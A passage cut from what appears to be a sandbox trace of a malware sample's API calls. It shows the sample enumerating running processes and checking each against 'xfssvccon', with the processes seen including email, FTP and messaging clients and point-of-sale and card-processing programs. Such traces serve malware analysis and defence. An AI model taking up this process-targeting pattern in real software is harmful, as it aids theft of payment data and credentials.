lpMultiByteStr=0x3568c58, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="operamail.exe", lpUsedDefaultChar=0x0) returned 14 [0094.022] lstrcpyA (in: lpString1=0x567fabc, lpString2="operamail.exe" | out: lpString1="operamail.exe") returned="operamail.exe" [0094.022] StrStrIA (lpFirst="operamail.exe", lpSrch="xfssvccon") returned 0x0 [0094.022] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0094.024] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="outlook.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0094.024] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x356a2c0 [0094.024] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="outlook.exe", cchWideChar=-1, lpMultiByteStr=0x356a2c0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="outlook.exe", lpUsedDefaultChar=0x0) returned 12 [0094.024] lstrcpyA (in: lpString1=0x567fabc, lpString2="outlook.exe" | out: lpString1="outlook.exe") returned="outlook.exe" [0094.024] StrStrIA (lpFirst="outlook.exe", lpSrch="xfssvccon") returned 0x0 [0094.024] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0094.025] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="pidgin.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0094.025] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x356a380 [0094.025] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="pidgin.exe", cchWideChar=-1, lpMultiByteStr=0x356a380, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="pidgin.exe", lpUsedDefaultChar=0x0) returned 11 [0094.026] lstrcpyA (in: lpString1=0x567fabc, lpString2="pidgin.exe" | out: lpString1="pidgin.exe") returned="pidgin.exe" [0094.026] StrStrIA (lpFirst="pidgin.exe", lpSrch="xfssvccon") returned 0x0 [0094.026] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0094.027] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="scriptftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0094.027] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x356a368 [0094.027] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="scriptftp.exe", cchWideChar=-1, lpMultiByteStr=0x356a368, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="scriptftp.exe", lpUsedDefaultChar=0x0) returned 14 [0094.027] lstrcpyA (in: lpString1=0x567fabc, lpString2="scriptftp.exe" | out: lpString1="scriptftp.exe") returned="scriptftp.exe" [0094.027] StrStrIA (lpFirst="scriptftp.exe", lpSrch="xfssvccon") returned 0x0 [0094.027] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0094.028] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="skype.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0094.028] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x356a260 [0094.028] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="skype.exe", cchWideChar=-1, lpMultiByteStr=0x356a260, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="skype.exe", lpUsedDefaultChar=0x0) returned 10 [0094.028] lstrcpyA (in: lpString1=0x567fabc, lpString2="skype.exe" | out: lpString1="skype.exe") returned="skype.exe" [0094.028] StrStrIA (lpFirst="skype.exe", lpSrch="xfssvccon") returned 0x0 [0094.028] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0094.029] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="smartftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0094.029] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x356a278 [0094.030] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="smartftp.exe", cchWideChar=-1, lpMultiByteStr=0x356a278, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="smartftp.exe", lpUsedDefaultChar=0x0) returned 13 [0094.030] lstrcpyA (in: lpString1=0x567fabc, lpString2="smartftp.exe" | out: lpString1="smartftp.exe") returned="smartftp.exe" [0094.030] StrStrIA (lpFirst="smartftp.exe", lpSrch="xfssvccon") returned 0x0 [0094.030] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0094.031] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="thunderbird.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0094.031] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x356a398 [0094.031] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="thunderbird.exe", cchWideChar=-1, lpMultiByteStr=0x356a398, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="thunderbird.exe", lpUsedDefaultChar=0x0) returned 16 [0094.031] lstrcpyA (in: lpString1=0x567fabc, lpString2="thunderbird.exe" | out: lpString1="thunderbird.exe") returned="thunderbird.exe" [0094.031] StrStrIA (lpFirst="thunderbird.exe", lpSrch="xfssvccon") returned 0x0 [0094.031] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="totalcmd.exe")) returned 1 [0094.032] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="totalcmd.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0094.032] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x356a2f0 [0094.032] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="totalcmd.exe", cchWideChar=-1, lpMultiByteStr=0x356a2f0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="totalcmd.exe", lpUsedDefaultChar=0x0) returned 13 [0094.032] lstrcpyA (in: lpString1=0x567fabc, lpString2="totalcmd.exe" | out: lpString1="totalcmd.exe") returned="totalcmd.exe" [0094.032] StrStrIA (lpFirst="totalcmd.exe", lpSrch="xfssvccon") returned 0x0 [0094.032] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0094.035] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="trillian.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0094.035] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x356a248 [0094.035] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="trillian.exe", cchWideChar=-1, lpMultiByteStr=0x356a248, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="trillian.exe", lpUsedDefaultChar=0x0) returned 13 [0094.036] lstrcpyA (in: lpString1=0x567fabc, lpString2="trillian.exe" | out: lpString1="trillian.exe") returned="trillian.exe" [0094.036] StrStrIA (lpFirst="trillian.exe", lpSrch="xfssvccon") returned 0x0 [0094.036] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0094.037] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="webdrive.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0094.037] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x356a3c8 [0094.037] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="webdrive.exe", cchWideChar=-1, lpMultiByteStr=0x356a3c8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="webdrive.exe", lpUsedDefaultChar=0x0) returned 13 [0094.037] lstrcpyA (in: lpString1=0x567fabc, lpString2="webdrive.exe" | out: lpString1="webdrive.exe") returned="webdrive.exe" [0094.037] StrStrIA (lpFirst="webdrive.exe", lpSrch="xfssvccon") returned 0x0 [0094.037] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xeec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0094.038] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="whatsapp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0094.038] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x356a3b0 [0094.039] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="whatsapp.exe", cchWideChar=-1, lpMultiByteStr=0x356a3b0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="whatsapp.exe", lpUsedDefaultChar=0x0) returned 13 [0094.039] lstrcpyA (in: lpString1=0x567fabc, lpString2="whatsapp.exe" | out: lpString1="whatsapp.exe") returned="whatsapp.exe" [0094.039] StrStrIA (lpFirst="whatsapp.exe", lpSrch="xfssvccon") returned 0x0 [0094.039] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0094.040] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="winscp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0094.040] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x356a3e0 [0094.040] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="winscp.exe", cchWideChar=-1, lpMultiByteStr=0x356a3e0, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="winscp.exe", lpUsedDefaultChar=0x0) returned 11 [0094.040] lstrcpyA (in: lpString1=0x567fabc, lpString2="winscp.exe" | out: lpString1="winscp.exe") returned="winscp.exe" [0094.040] StrStrIA (lpFirst="winscp.exe", lpSrch="xfssvccon") returned 0x0 [0094.040] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0094.041] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="yahoomessenger.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0094.041] LocalAlloc (uFlags=0x40, uBytes=0x13) returned 0x35695e8 [0094.041] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="yahoomessenger.exe", cchWideChar=-1, lpMultiByteStr=0x35695e8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="yahoomessenger.exe", lpUsedDefaultChar=0x0) returned 19 [0094.041] lstrcpyA (in: lpString1=0x567fabc, lpString2="yahoomessenger.exe" | out: lpString1="yahoomessenger.exe") returned="yahoomessenger.exe" [0094.041] StrStrIA (lpFirst="yahoomessenger.exe", lpSrch="xfssvccon") returned 0x0 [0094.041] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xffc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0094.043] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="active-charge.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0094.043] LocalAlloc (uFlags=0x40, uBytes=0x12) returned 0x35698c8 [0094.043] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="active-charge.exe", cchWideChar=-1, lpMultiByteStr=0x35698c8, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="active-charge.exe", lpUsedDefaultChar=0x0) returned 18 [0094.043] lstrcpyA (in: lpString1=0x567fabc, lpString2="active-charge.exe" | out: lpString1="active-charge.exe") returned="active-charge.exe" [0094.043] StrStrIA (lpFirst="active-charge.exe", lpSrch="xfssvccon") returned 0x0 [0094.043] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xce8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0094.044] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="accupos.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0094.044] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x356a290 [0094.044] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="accupos.exe", cchWideChar=-1, lpMultiByteStr=0x356a290, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="accupos.exe", lpUsedDefaultChar=0x0) returned 12 [0094.044] lstrcpyA (in: lpString1=0x567fabc, lpString2="accupos.exe" | out: lpString1="accupos.exe") returned="accupos.exe" [0094.044] StrStrIA (lpFirst="accupos.exe", lpSrch="xfssvccon") returned 0x0 [0094.044] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd08, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0094.045] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="afr38.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0094.045] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x356a230 [0094.045] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="afr38.exe", cchWideChar=-1, lpMultiByteStr=0x356a230, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="afr38.exe", lpUsedDefaultChar=0x0) returned 10 [0094.045] lstrcpyA (in: lpString1=0x567fabc, lpString2="afr38.exe" | out: lpString1="afr38.exe") returned="afr38.exe" [0094.045] StrStrIA (lpFirst="afr38.exe", lpSrch="xfssvccon") returned 0x0 [0094.045] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0094.047] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="aldelo.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0094.047] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x356a2a8 [0094.047] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="aldelo.exe", cchWideChar=-1, lpMultiByteStr=0x356a2a8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="aldelo.exe", lpUsedDefaultChar=0x0) returned 11 [0094.047] lstrcpyA (in: lpString1=0x567fabc, lpString2="aldelo.exe" | out: lpString1="aldelo.exe") returned="aldelo.exe" [0094.047] StrStrIA (lpFirst="aldelo.exe", lpSrch="xfssvccon") returned 0x0 [0094.047] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xabc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0094.048] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ccv_server.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0094.048] LocalAlloc (uFlags=0x40, uBytes=0xf) returned 0x356a2d8 [0094.048] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ccv_server.exe", cchWideChar=-1, lpMultiByteStr=0x356a2d8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ccv_server.exe", lpUsedDefaultChar=0x0) returned 15 [0094.048] lstrcpyA (in: lpString1=0x567fabc, lpString2="ccv_server.exe" | out: lpString1="ccv_server.exe") returned="ccv_server.exe" [0094.048] StrStrIA (lpFirst="ccv_server.exe", lpSrch="xfssvccon") returned 0x0 [0094.048] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0094.050] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="centralcreditcard.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0094.050] LocalAlloc (uFlags=0x40, uBytes=0x16) returned 0x35698e8 [0094.050] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="centralcreditcard.exe", cchWideChar=-1, lpMultiByteStr=0x35698e8, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="centralcreditcard.exe", lpUsedDefaultChar=0x0) returned 22 [0094.050] lstrcpyA (in: lpString1=0x567fabc, lpString2="centralcreditcard.exe" | out: lpString1="centralcreditcard.exe") returned="centralcreditcard.exe" [0094.050] StrStrIA (lpFirst="centralcreditcard.exe", lpSrch="xfssvccon") returned 0x0 [0094.050] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x804, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0094.051] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="creditservice.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0094.051] LocalAlloc (uFlags=0x40, uBytes=0x12) returned 0x35699c8 [0094.051] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="creditservice.exe", cchWideChar=-1, lpMultiByteStr=0x35699c8, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="creditservice.exe", lpUsedDefaultChar=0x0) returned 18 [0094.051] lstrcpyA (in: lpString1=0x567fabc, lpString2="creditservice.exe" | out: lpString1="creditservice.exe") returned="creditservice.exe" [0094.052] StrStrIA (lpFirst="creditservice.exe", lpSrch="xfssvccon") returned 0x0 [0094.052] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0094.053] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="edcsvr.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0094.053] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x356a308 [0094.053] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="edcsvr.exe", cchWideChar=-1, lpMultiByteStr=0x356a308, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="edcsvr.exe", lpUsedDefaultChar=0x0) returned 11 [0094.053] lstrcpyA (in: lpString1=0x567fabc, lpString2="edcsvr.exe" | out: lpString1="edcsvr.exe") returned="edcsvr.exe" [0094.053] StrStrIA (lpFirst="edcsvr.exe", lpSrch="xfssvccon") returned 0x0 [0094.053] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0094.054] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fpos.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0094.054] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x356a320 [0094.054] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fpos.exe", cchWideChar=-1, lpMultiByteStr=0x356a320, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="fpos.exe", lpUsedDefaultChar=0x0) returned 9 [0094.054] lstrcpyA (in: lpString1=0x567fabc, lpString2="fpos.exe" | out: lpString1="fpos.exe") returned="fpos.exe" [0094.054] StrStrIA (lpFirst="fpos.exe", lpSrch="xfssvccon") returned 0x0 [0094.054] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xeb4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0094.055] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="isspos.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0094.055] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x356a338 [0094.055] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="isspos.exe", cchWideChar=-1, lpMultiByteStr=0x356a338, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="isspos.exe", lpUsedDefaultChar=0x0) returned 11 [0094.056] lstrcpyA (in: lpString1=0x567fabc, lpString2="isspos.exe" | out: lpString1="isspos.exe") returned="isspos.exe" [0094.056] StrStrIA (lpFirst="isspos.exe", lpSrch="xfssvccon") returned 0x0 [0094.056] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0094.057] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="mxslipstream.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0094.057] LocalAlloc (uFlags=0x40, uBytes=0x11) returned 0x3569ac8 [0094.057] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="mxslipstream.exe", cchWideChar=-1, 